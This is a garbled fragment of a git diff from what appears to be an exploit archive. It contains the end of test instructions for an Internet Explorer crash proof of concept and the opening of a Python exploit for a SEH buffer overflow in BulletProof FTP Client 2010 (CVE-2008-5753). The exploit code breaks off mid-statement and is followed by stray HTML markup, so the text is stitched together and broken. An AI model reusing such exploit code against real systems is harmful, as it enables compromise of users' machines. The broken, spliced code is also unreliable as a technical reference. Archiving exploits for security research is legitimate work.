it? + +- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime. + +a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full +b) Execute runMe.html in WinDbg +c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10) \ No newline at end of file diff --git a/platforms/windows/local/37056.py b/platforms/windows/local/37056.py new file mode 100755 index 000000000..451e9d4a3 --- /dev/null +++ b/platforms/windows/local/37056.py @@ -0,0 +1,119 @@ +#-----------------------------------------------------------------------------# +# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) # +# Date: Feb 15 2015 # +# Exploit Author: Gabor Seljan # +# Software Link: http://www.bpftp.com/ # +# Version: 2010.75.0.76 # +# Tested on: Windows XP SP3 English # +# Credits: His0k4 # +# CVE: CVE-2008-5753 # +#-----------------------------------------------------------------------------# + +#!/usr/bin/python + +from struct import pack + +# offset to SEH is 93 byte +buf = b'A' * 13 +buf += pack(' + + + +
+ + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file